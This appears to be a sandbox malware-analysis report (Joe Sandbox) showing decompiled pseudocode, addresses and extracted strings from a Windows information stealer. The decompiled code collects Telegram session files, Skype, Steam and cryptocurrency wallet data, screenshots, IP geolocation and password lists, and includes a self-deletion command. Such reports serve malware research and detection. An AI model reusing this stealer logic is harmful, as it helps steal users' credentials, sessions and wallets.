								if(_t1173 != 0) {
									goto L61;
								}
								E004038DC( *_v56, 0x41a400);
								if(_t1173 != 0) {
									goto L61;
								}
								_t970 =  &_v60;
								E0040795C(0x41a40c,  &_v60,  *((intOrPtr*)(_v56 + 0xc)), _t1173);
								_v83 = 0;
								_t1137 = E004045EC(_v60) - 1;
								if(_t1137 < 0) {
									L59:
									_t1179 = _v83 - 1;
									if(_v83 == 1) {
										E004038DC( *((intOrPtr*)(_v56 + 8)), 0x41a418);
										E00418CF4( *((intOrPtr*)(_v56 + 4)), _t955, 0x41a400 | _t1179 == 0x00000000, _t1134, _t1137);
									}
									goto L61;
								}
								_t1137 = _t1137 + 1;
								_v68 = 0;
								while(1) {
									E00406318( *((intOrPtr*)(_v60 + _v68 * 4)), _t955,  &_v612, _t1134, _t1137);
									_t1072 =  *0x41b568; // 0x41c66c
									_v83 = E00403A78(_v612,  *_t1072) != 0;
									if(_v83 == 1) {
										goto L59;
									}
									_v68 = _v68 + 1;
									_t1137 = _t1137 - 1;
									if(_t1137 != 0) {
										continue;
									}
									goto L59;
								}
								goto L59;
								L61:
								_t955 = _t955 + 1;
								_t1134 = _t1134 - 1;
								_t1181 = _t1134;
							} while (_t1181 != 0);
							goto L62;
						}
					} else {
						_t1135 = _t1132 + 1;
						_t956 = 0;
						do {
							if(E00403790( *((intOrPtr*)(_v44 + _t956 * 4))) < 5) {
								goto L47;
							}
							if(_t956 == 0) {
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 9)) == 0x2b) {
									E00414098();
								}
								_t907 =  *((intOrPtr*)(_v44 + _t956 * 4));
								_t1154 =  *((char*)(_t907 + 3)) - 0x2b;
								if( *((char*)(_t907 + 3)) == 0x2b) {
									E00415EA8(L"Coins", _t956, _t968, _t1017, _t1135, _t1137, _t1154);
									_t932 =  *0x41b5c4; // 0x41b0b0
									_t1155 =  *_t932;
									if( *_t932 > 0) {
										E004050C8(0x41a200, _t956, _t1135, _t1137, _t1155);
									}
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 4)) == 0x2b) {
									E00414CB8(L"Skype", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 5)) == 0x2b) {
									_t968 = L"Telegram";
									_t1017 = L"D877F783D5*,map*";
									E00414408(L"%appdata%\\Telegram Desktop\\tdata\\", _t956, L"Telegram", L"D877F783D5*,map*", _t1135, _t1137, 0, 0, 1, 0x3e8, 0);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 6)) == 0x2b) {
									E00414F40(L"Steam", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 7)) == 0x2b) {
									_push(0);
									_push(0x32);
									_push(L"image/jpeg");
									_push( &_v64);
									_push(GetSystemMetrics(1));
									_t920 = GetSystemMetrics(0);
									_t968 = 0;
									_pop(_t1094);
									E004178B4(_t920, _t956, 0, _t1094, _t1135, _t1137);
									_t1017 = "scr.jpg";
									E0040DCE8(_v64, _t956, "scr.jpg", _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 8)) == 0x2b) {
									_v82 = 1;
								}
							}
							_t756 = _v44;
							_t1162 =  *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) - 0x46;
							if( *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) != 0x46) {
								L41:
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) == 0x4c) {
									_push(_v72);
									_push( *((intOrPtr*)(_v44 + _t956 * 4)));
									_push(0x41a1ac);
									_t1017 = 3;
									E00403850();
								}
								_t1167 =  *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) - 0x49;
								if(_t1167 == 0) {
									_t968 =  &_v48;
									E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1167);
									E004038DC( *((intOrPtr*)(_v48 + 4)), 0x41a348);
									if(_t1167 != 0) {
										_t1017 = "ip.txt";
										E0040DCE8( *((intOrPtr*)(_v48 + 4)), _t956, "ip.txt", _t1135, _t1137);
									} else {
										_v81 = 1;
										E00418688("http://ip-api.com/json", _t956, 0, _t1135, _t1137,  &_v28);
										E00407428("\"query\":\"", _t956, 0x41a380, _v28, _t1137,  &_v76);
										_t968 = 0x41a380;
										E00407428("\"countryCode\":\"", _t956, 0x41a380, _v28, _t1137,  &_v80);
										_push(_v76);
										_push(0x41a3b8);
										_push(_v80);
										E00403850();
										_t1017 = "ip.txt";
										E0040DCE8(_v456, _t956, "ip.txt", _t1135, _t1137);
									}
								}
							} else {
								E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1162);
								E0040357C( &_v92,  *((intOrPtr*)(_v48 + 8)));
								if(E00403A78(0x41a2e8, _v92) != 1) {
									E00403D2C( &_v428,  *((intOrPtr*)(_v48 + 0x1c)));
									_push(_v428);
									E00403D2C( &_v432,  *((intOrPtr*)(_v48 + 0x10)));
									_push(E00407048(_v432, _t956,  &_v48, __eflags));
									_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
									_t806 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
									_t193 = __eflags == 0;
									__eflags = _t193;
									_push(_t806 & 0xffffff00 | _t193);
									_push(1);
									_push("Files\\");
									_push( *((intOrPtr*)(_v48 + 4)));
									_push(0x41a310);
									E00403850();
									E00403D2C( &_v436, _v440);
									_push(_v436);
									E00403D2C( &_v444,  *((intOrPtr*)(_v48 + 0xc)));
									_push(_v444);
									E004037DC( &_v452, 0x41a310,  *((intOrPtr*)(_v48 + 8)));
									E00403D2C( &_v448, _v452);
									_pop(_t1017);
									_pop(_t968);
									E00414408(_v448, _t956, _t968, _t1017, _t1135, _t1137);
									goto L41;
								}
								_t968 = 0x41a2f8;
								_t1017 = _v92;
								E00407428(0x41a2e8, _t956, 0x41a2f8, _v92, _t1137,  &_v104);
								_push( &_v241);
								_push(0x81);
								_t827 =  *0x41b59c; // 0x41c6fc
								if( *((intOrPtr*)( *_t827))() == 0) {
									goto L68;
								}
								_t1137 =  &_v241;
								while( *_t1137 != 0) {
									_t830 =  *0x41b54c; // 0x41c700
									E00406FDC( *((intOrPtr*)( *_t830))(_t1137), _t956,  &_v360, _t1137, __eflags);
									E0040377C( &_v356, _v360);
									_t1017 = _v104;
									_t837 = E00403A78(_v356, _v104);
									__eflags = _t837;
									if(_t837 != 0) {
										_push( &_v364);
										E00403C98( &_v368, _t1137);
										_push(_v368);
										_push("%DSK_");
										_push(_v104);
										E00403850();
										E00403D2C( &_v372, _v376);
										_push(_v372);
										E00403D2C( &_v380, _v92);
										_pop(_t1102);
										_t975 = 0x41a304;
										E004070BC(_v380, _t956, _t975, _t1102);
										E0040377C( &_v100, _v364);
										E004034E4( &_v96);
										_push( *((intOrPtr*)(_v48 + 4)));
										_push(0x41a310);
										_push(_v100);
										E00403850();
										E00403D2C( &_v388, _v96);
										E004070BC(_v388, _t956, 0, 0x41a318,  &_v384);
										E00403D58( &_v384, 0, 0x41a320, __eflags);
										E0040377C( &_v96, _v384);
										E00403D2C( &_v396, _v96);
										E0040781C(_v396, _t956,  &_v392, __eflags);
										E0040377C( &_v96, _v392);
										E00403D2C( &_v400,  *((intOrPtr*)(_v48 + 0x1c)));
										_push(_v400);
										E00403D2C( &_v404,  *((intOrPtr*)(_v48 + 0x10)));
										_push(E00407048(_v404, _t956, 0, __eflags));
										_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
										_t884 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
										_t163 = __eflags == 0;
										__eflags = _t163;
										_push(_t884 & 0xffffff00 | _t163);
										_push(1);
										E004037DC( &_v412, _v96, "Files\\");
										E00403D2C( &_v408, _v412);
										_push(_v408);
										E00403D2C( &_v416,  *((intOrPtr*)(_v48 + 0xc)));
										_push(_v416);
										E004037DC( &_v424, 0x41a310, _v100);
										E00403D2C( &_v420, _v424);
										_pop(_t1017);
										_pop(_t968);
										E00414408(_v420, _t956, _t968, _t1017, _t1135, _t1137);
									}
									_t1137 = _t1137 + 4;
									__eflags = _t1137;
								}
								goto L41;
							}
							L47:
							_t956 = _t956 + 1;
							_t1135 = _t1135 - 1;
							_t1168 = _t1135;
						} while (_t1135 != 0);
						goto L48;
					}
				}
			}















































































































































































                                                                                                    0x00419108
                                                                                                    0x00419108
                                                                                                    0x00419109
                                                                                                    0x0041910b
                                                                                                    0x00419110
                                                                                                    0x00419110
                                                                                                    0x00419112
                                                                                                    0x00419114
                                                                                                    0x00419114
                                                                                                    0x00419114
                                                                                                    0x00419117
                                                                                                    0x00419118
                                                                                                    0x00419119
                                                                                                    0x0041911a
                                                                                                    0x00419120
                                                                                                    0x00419127
                                                                                                    0x00419128
                                                                                                    0x0041912d
                                                                                                    0x00419130
                                                                                                    0x00419136
                                                                                                    0x0041913b
                                                                                                    0x0041913f
                                                                                                    0x0041914b
                                                                                                    0x00419150
                                                                                                    0x0041915b
                                                                                                    0x00419166
                                                                                                    0x0041916d
                                                                                                    0x00419178
                                                                                                    0x00419179
                                                                                                    0x00419195
                                                                                                    0x00419197
                                                                                                    0x0041919a
                                                                                                    0x004191a8
                                                                                                    0x00419f30
                                                                                                    0x00419f32
                                                                                                    0x00419f35
                                                                                                    0x00419f38
                                                                                                    0x00419f43
                                                                                                    0x00419f53
                                                                                                    0x00419f5e
                                                                                                    0x00419f6e
                                                                                                    0x00419f7e
                                                                                                    0x00419f89
                                                                                                    0x00419f99
                                                                                                    0x00419fa4
                                                                                                    0x00419fb4
                                                                                                    0x00419fbf
                                                                                                    0x00419fcf
                                                                                                    0x00419fda
                                                                                                    0x00419fea
                                                                                                    0x00419ff5
                                                                                                    0x0041a005
                                                                                                    0x0041a010
                                                                                                    0x0041a020
                                                                                                    0x0041a02b
                                                                                                    0x0041a03b
                                                                                                    0x0041a046
                                                                                                    0x0041a056
                                                                                                    0x0041a066
                                                                                                    0x0041a071
                                                                                                    0x0041a081
                                                                                                    0x0041a08c
                                                                                                    0x0041a09c
                                                                                                    0x0041a0a7
                                                                                                    0x0041a0b7
                                                                                                    0x0041a0c2
                                                                                                    0x0041a0d2
                                                                                                    0x0041a0e2
                                                                                                    0x0041a0ea
                                                                                                    0x0041a0f5
                                                                                                    0x0041a102
                                                                                                    0x0041a10a
                                                                                                    0x0041a112
                                                                                                    0x0041a11f
                                                                                                    0x0041a12c
                                                                                                    0x0041a139
                                                                                                    0x004191ae
                                                                                                    0x004191b1
                                                                                                    0x004191b6
                                                                                                    0x004191bb
                                                                                                    0x004191c0
                                                                                                    0x004191cd
                                                                                                    0x004191db
                                                                                                    0x004191e0
                                                                                                    0x004191e1
                                                                                                    0x004191e2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004191e2
                                                                                                    0x004191e7
                                                                                                    0x004191f2
                                                                                                    0x00419203
                                                                                                    0x00419214
                                                                                                    0x00419224
                                                                                                    0x00419232
                                                                                                    0x00419237
                                                                                                    0x00419247
                                                                                                    0x00419254
                                                                                                    0x00419259
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419267
                                                                                                    0x0041926c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419286
                                                                                                    0x00419294
                                                                                                    0x004192ad
                                                                                                    0x004192bb
                                                                                                    0x004192cb
                                                                                                    0x004192d7
                                                                                                    0x004192e4
                                                                                                    0x004192ef
                                                                                                    0x004192f5
                                                                                                    0x00419300
                                                                                                    0x00419308
                                                                                                    0x0041930f
                                                                                                    0x0041931e
                                                                                                    0x00419321
                                                                                                    0x00419909
                                                                                                    0x00419909
                                                                                                    0x0041990c
                                                                                                    0x00419917
                                                                                                    0x0041991c
                                                                                                    0x0041992d
                                                                                                    0x0041993d
                                                                                                    0x00419948
                                                                                                    0x00419959
                                                                                                    0x0041995e
                                                                                                    0x00419964
                                                                                                    0x0041996f
                                                                                                    0x00419980
                                                                                                    0x00419985
                                                                                                    0x0041998b
                                                                                                    0x00419996
                                                                                                    0x004199a7
                                                                                                    0x004199b8
                                                                                                    0x004199bd
                                                                                                    0x004199c3
                                                                                                    0x004199ce
                                                                                                    0x004199df
                                                                                                    0x004199f0
                                                                                                    0x004199f5
                                                                                                    0x004199fb
                                                                                                    0x00419a06
                                                                                                    0x00419a17
                                                                                                    0x00419a28
                                                                                                    0x00419a2d
                                                                                                    0x00419a33
                                                                                                    0x00419a3e
                                                                                                    0x00419a4f
                                                                                                    0x00419a60
                                                                                                    0x00419a65
                                                                                                    0x00419a6b
                                                                                                    0x00419a76
                                                                                                    0x00419a7d
                                                                                                    0x00419a8e
                                                                                                    0x00419a9f
                                                                                                    0x00419aa4
                                                                                                    0x00419aaa
                                                                                                    0x00419ab5
                                                                                                    0x00419abc
                                                                                                    0x00419acd
                                                                                                    0x00419ade
                                                                                                    0x00419ae3
                                                                                                    0x00419ae9
                                                                                                    0x00419af4
                                                                                                    0x00419afb
                                                                                                    0x00419b0c
                                                                                                    0x00419b1d
                                                                                                    0x00419b22
                                                                                                    0x00419b28
                                                                                                    0x00419b33
                                                                                                    0x00419b3a
                                                                                                    0x00419b4b
                                                                                                    0x00419b5c
                                                                                                    0x00419b61
                                                                                                    0x00419b67
                                                                                                    0x00419b75
                                                                                                    0x00419b7a
                                                                                                    0x00419b80
                                                                                                    0x00419b8b
                                                                                                    0x00419b9c
                                                                                                    0x00419ba1
                                                                                                    0x00419baf
                                                                                                    0x00419bb4
                                                                                                    0x00419bb9
                                                                                                    0x00419bc1
                                                                                                    0x00419bcb
                                                                                                    0x00419bce
                                                                                                    0x00419bd3
                                                                                                    0x00419bdb
                                                                                                    0x00419be0
                                                                                                    0x00419be6
                                                                                                    0x00419beb
                                                                                                    0x00419bf3
                                                                                                    0x00419bf8
                                                                                                    0x00419bfe
                                                                                                    0x00419c03
                                                                                                    0x00419c0b
                                                                                                    0x00419c10
                                                                                                    0x00419c16
                                                                                                    0x00419c1b
                                                                                                    0x00419c25
                                                                                                    0x00419c2a
                                                                                                    0x00419c2e
                                                                                                    0x00419c30
                                                                                                    0x00419c33
                                                                                                    0x00419c38
                                                                                                    0x00419c46
                                                                                                    0x00419c54
                                                                                                    0x00419c54
                                                                                                    0x00419c64
                                                                                                    0x00419c70
                                                                                                    0x00419c75
                                                                                                    0x00419c7a
                                                                                                    0x00419c83
                                                                                                    0x00419c8a
                                                                                                    0x00419c91
                                                                                                    0x00419c99
                                                                                                    0x00419c9e
                                                                                                    0x00419ca1
                                                                                                    0x00419db1
                                                                                                    0x00419db1
                                                                                                    0x00419dbc
                                                                                                    0x00419dcc
                                                                                                    0x00419dd1
                                                                                                    0x00419dec
                                                                                                    0x00419df4
                                                                                                    0x00419df9
                                                                                                    0x00419dff
                                                                                                    0x00419e03
                                                                                                    0x00419e16
                                                                                                    0x00419e1b
                                                                                                    0x00419e25
                                                                                                    0x00419e31
                                                                                                    0x00419e39
                                                                                                    0x00419e4a
                                                                                                    0x00419e5a
                                                                                                    0x00419e6b
                                                                                                    0x00419e7e
                                                                                                    0x00419e8f
                                                                                                    0x00419ea0
                                                                                                    0x00419ebb
                                                                                                    0x00419ecb
                                                                                                    0x00419ed9
                                                                                                    0x00419eea
                                                                                                    0x00419efb
                                                                                                    0x00419f0b
                                                                                                    0x00419f11
                                                                                                    0x00419f13
                                                                                                    0x00419f20
                                                                                                    0x00419f27
                                                                                                    0x00419f2b
                                                                                                    0x00419f2b
                                                                                                    0x00419e03
                                                                                                    0x00000000
                                                                                                    0x00419df9
                                                                                                    0x00419ddb
                                                                                                    0x00419de0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419de2
                                                                                                    0x00000000
                                                                                                    0x00419ca7
                                                                                                    0x00419ca7
                                                                                                    0x00419cb2
                                                                                                    0x00419cc1
                                                                                                    0x00419cc4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419cca
                                                                                                    0x00419ccb
                                                                                                    0x00419ccd
                                                                                                    0x00419ccd
                                                                                                    0x00419cdd
                                                                                                    0x00419ce2
                                                                                                    0x00419ce5
                                                                                                    0x00419cf3
                                                                                                    0x00419d00
                                                                                                    0x00419d03
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419d13
                                                                                                    0x00419d18
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419d1e
                                                                                                    0x00419d2c
                                                                                                    0x00419d31
                                                                                                    0x00419d3f
                                                                                                    0x00419d42
                                                                                                    0x00419d85
                                                                                                    0x00419d85
                                                                                                    0x00419d89
                                                                                                    0x00419d96
                                                                                                    0x00419da4
                                                                                                    0x00419da4
                                                                                                    0x00000000
                                                                                                    0x00419d89
                                                                                                    0x00419d44
                                                                                                    0x00419d45
                                                                                                    0x00419d4c
                                                                                                    0x00419d5b
                                                                                                    0x00419d66
                                                                                                    0x00419d75
                                                                                                    0x00419d7d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419d7f
                                                                                                    0x00419d82
                                                                                                    0x00419d83
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419d83
                                                                                                    0x00000000
                                                                                                    0x00419da9
                                                                                                    0x00419da9
                                                                                                    0x00419daa
                                                                                                    0x00419daa
                                                                                                    0x00419daa
                                                                                                    0x00000000
                                                                                                    0x00419ccd
                                                                                                    0x00419327
                                                                                                    0x00419327
                                                                                                    0x00419328
                                                                                                    0x0041932a
                                                                                                    0x00419338
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419340
                                                                                                    0x004193bb
                                                                                                    0x004193bd
                                                                                                    0x004193bd
                                                                                                    0x004193c5
                                                                                                    0x004193c8
                                                                                                    0x004193cc
                                                                                                    0x004193d3
                                                                                                    0x004193d8
                                                                                                    0x004193dd
                                                                                                    0x004193e0
                                                                                                    0x004193e7
                                                                                                    0x004193e7
                                                                                                    0x004193e0
                                                                                                    0x004193f6
                                                                                                    0x004193fd
                                                                                                    0x004193fd
                                                                                                    0x0041940c
                                                                                                    0x0041941b
                                                                                                    0x00419420
                                                                                                    0x0041942a
                                                                                                    0x0041942a
                                                                                                    0x00419439
                                                                                                    0x00419440
                                                                                                    0x00419440
                                                                                                    0x0041944f
                                                                                                    0x00419451
                                                                                                    0x00419453
                                                                                                    0x00419455
                                                                                                    0x0041945d
                                                                                                    0x00419465
                                                                                                    0x00419468
                                                                                                    0x0041946d
                                                                                                    0x0041946f
                                                                                                    0x00419470
                                                                                                    0x00419475
                                                                                                    0x0041947d
                                                                                                    0x0041947d
                                                                                                    0x0041948c
                                                                                                    0x0041948e
                                                                                                    0x0041948e
                                                                                                    0x0041948c
                                                                                                    0x00419492
                                                                                                    0x00419498
                                                                                                    0x0041949b
                                                                                                    0x00419825
                                                                                                    0x0041982e
                                                                                                    0x00419830
                                                                                                    0x00419836
                                                                                                    0x00419839
                                                                                                    0x00419841
                                                                                                    0x00419846
                                                                                                    0x00419846
                                                                                                    0x00419851
                                                                                                    0x00419854
                                                                                                    0x0041985a
                                                                                                    0x00419868
                                                                                                    0x00419878
                                                                                                    0x0041987d
                                                                                                    0x004198f7
                                                                                                    0x004198fc
                                                                                                    0x0041987f
                                                                                                    0x0041987f
                                                                                                    0x00419893
                                                                                                    0x004198a9
                                                                                                    0x004198b2
                                                                                                    0x004198bf
                                                                                                    0x004198c4
                                                                                                    0x004198c7
                                                                                                    0x004198cc
                                                                                                    0x004198da
                                                                                                    0x004198e5
                                                                                                    0x004198ea
                                                                                                    0x004198ea
                                                                                                    0x0041987d
                                                                                                    0x004194a1
                                                                                                    0x004194af
                                                                                                    0x004194bd
                                                                                                    0x004194d0
                                                                                                    0x0041974e
                                                                                                    0x00419759
                                                                                                    0x00419766
                                                                                                    0x00419776
                                                                                                    0x0041978a
                                                                                                    0x00419796
                                                                                                    0x0041979b
                                                                                                    0x0041979b
                                                                                                    0x0041979e
                                                                                                    0x0041979f
                                                                                                    0x004197a1
                                                                                                    0x004197a9
                                                                                                    0x004197ac
                                                                                                    0x004197bc
                                                                                                    0x004197cd
                                                                                                    0x004197d8
                                                                                                    0x004197e5
                                                                                                    0x004197f0
                                                                                                    0x00419802
                                                                                                    0x00419813
                                                                                                    0x0041981e
                                                                                                    0x0041981f
                                                                                                    0x00419820
                                                                                                    0x00000000
                                                                                                    0x00419820
                                                                                                    0x004194da
                                                                                                    0x004194df
                                                                                                    0x004194e7
                                                                                                    0x004194f2
                                                                                                    0x004194f3
                                                                                                    0x004194f8
                                                                                                    0x00419503
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00419509
                                                                                                    0x00419734
                                                                                                    0x00419515
                                                                                                    0x00419524
                                                                                                    0x00419535
                                                                                                    0x00419540
                                                                                                    0x00419543
                                                                                                    0x00419548
                                                                                                    0x0041954a
                                                                                                    0x00419556
                                                                                                    0x0041955f
                                                                                                    0x0041956a
                                                                                                    0x0041956b
                                                                                                    0x00419570
                                                                                                    0x00419583
                                                                                                    0x00419594
                                                                                                    0x0041959f
                                                                                                    0x004195a9
                                                                                                    0x004195b4
                                                                                                    0x004195b5
                                                                                                    0x004195b6
                                                                                                    0x004195c4
                                                                                                    0x004195cc
                                                                                                    0x004195d4
                                                                                                    0x004195d7
                                                                                                    0x004195dc
                                                                                                    0x004195e7
                                                                                                    0x004195fc
                                                                                                    0x0041960e
                                                                                                    0x0041961e
                                                                                                    0x0041962c
                                                                                                    0x0041963a
                                                                                                    0x0041964b
                                                                                                    0x00419659
                                                                                                    0x0041966a
                                                                                                    0x00419675
                                                                                                    0x00419682
                                                                                                    0x00419692
                                                                                                    0x004196a6
                                                                                                    0x004196b2
                                                                                                    0x004196b7
                                                                                                    0x004196b7
                                                                                                    0x004196ba
                                                                                                    0x004196bb
                                                                                                    0x004196cb
                                                                                                    0x004196dc
                                                                                                    0x004196e7
                                                                                                    0x004196f4
                                                                                                    0x004196ff
                                                                                                    0x0041970e
                                                                                                    0x0041971f
                                                                                                    0x0041972a
                                                                                                    0x0041972b
                                                                                                    0x0041972c
                                                                                                    0x0041972c
                                                                                                    0x00419731
                                                                                                    0x00419731
                                                                                                    0x00419731
                                                                                                    0x00000000
                                                                                                    0x0041973d
                                                                                                    0x00419901
                                                                                                    0x00419901
                                                                                                    0x00419902
                                                                                                    0x00419902
                                                                                                    0x00419902
                                                                                                    0x00000000
                                                                                                    0x0041932a
                                                                                                    0x00419321

                                                                                                    APIs
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195
                                                                                                      • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                      • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                    • GetSystemMetrics.USER32 ref: 00419460
                                                                                                    • GetSystemMetrics.USER32 ref: 00419468
                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 00419F2B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
                                                                                                    • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
                                                                                                    • API String ID: 447519224-805684967
                                                                                                    • Opcode ID: 1c7e7bd3b57c3ebf540cd3875733a8de147795d5b5e20487decf991366150f99
                                                                                                    • Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
                                                                                                    • Opcode Fuzzy Hash: 1c7e7bd3b57c3ebf540cd3875733a8de147795d5b5e20487decf991366150f99
                                                                                                    • Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040831C Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 323libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 633 40831c-40832b 635 408330-408335 633->635 635->635 636 408337-4083fa call 403980 call 406c4c call 406258 * 2 call 403d2c call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 call 40813c call 403db8 call 4076b0 635->636 663 408444-40845a 636->663 664 4083fc-40843f call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 636->664 668 40845c-40847a call 4040b0 call 403d3c 663->668 669 40847e-4084ee call 403e1c call 403d3c * 2 SetCurrentDirectoryW call 40813c call 403db8 call 403d3c LoadLibraryExW 663->669 664->663 668->669 694 4084f4-4086c2 call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress 669->694 695 408737-408780 call 403508 call 403b98 call 403508 call 403b98 call 4034e4 669->695 694->695 759 4086c4-4086cb 694->759 759->695 760 4086cd-4086d4 759->760 760->695 761 4086d6-4086dd 760->761 761->695 762 4086df-4086e6 761->762 762->695 763 4086e8-4086ef 762->763 763->695 764 4086f1-4086f8 763->764 764->695 765 4086fa-408701 764->765 765->695 766 408703-40870a 765->766 766->695 767 40870c-408713 766->767 767->695 768 408715-40871c 767->768 768->695 769 40871e-408725 768->769 769->695 770 408727-40872e 769->770 770->695 771 408730 770->771 771->695
                                                                                                    C-Code - Quality: 74%
                                                                                                    			E0040831C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t69;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr* _t103;
				struct HINSTANCE__* _t117;
				intOrPtr* _t211;
				void* _t226;
				intOrPtr _t244;
				void* _t270;
				intOrPtr _t272;
				intOrPtr _t273;

				_t269 = __esi;
				 *__eax =  *__eax + __eax;
				_t69 = __eax +  *__eax;
				 *_t69 =  *_t69 + _t69;
				asm("das");
				 *_t69 =  *_t69 + _t69;
				_v117 = _v117 + __edx;
				_t272 = _t273;
				_t226 = 0xd;
				do {
					_push(0);
					_push(0);
					_t226 = _t226 - 1;
					_t277 = _t226;
				} while (_t226 != 0);
				_push(_t226);
				_push(__ebx);
				_push(__esi);
				_v8 = _t69;
				E00403980(_v8);
				_push(_t272);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t273;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi); // executed
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t277);
				E00406258(_v24, 0x41c7bc,  &_v20, _t269, _t277);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t277);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0); // executed
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t277); // executed
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t277);
				_t96 = E004076B0(_v40, 0x41c7bc, _v44); // executed
				_t278 = _t96;
				if(_t96 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t278);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t278);
				}
				_t97 =  *0x41b578; // 0x41c6b0
				_t270 =  *((intOrPtr*)( *_t97))(L"PATH", 0, 0);
				_t279 = _t270;
				if(_t270 > 0) {
					E004040B0( &_v12, _t270);
					_t211 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t211))(L"PATH", E00403D3C(_v12), _t270);
				}
				E00403E1C();
				_t103 =  *0x41b614; // 0x41c6ac
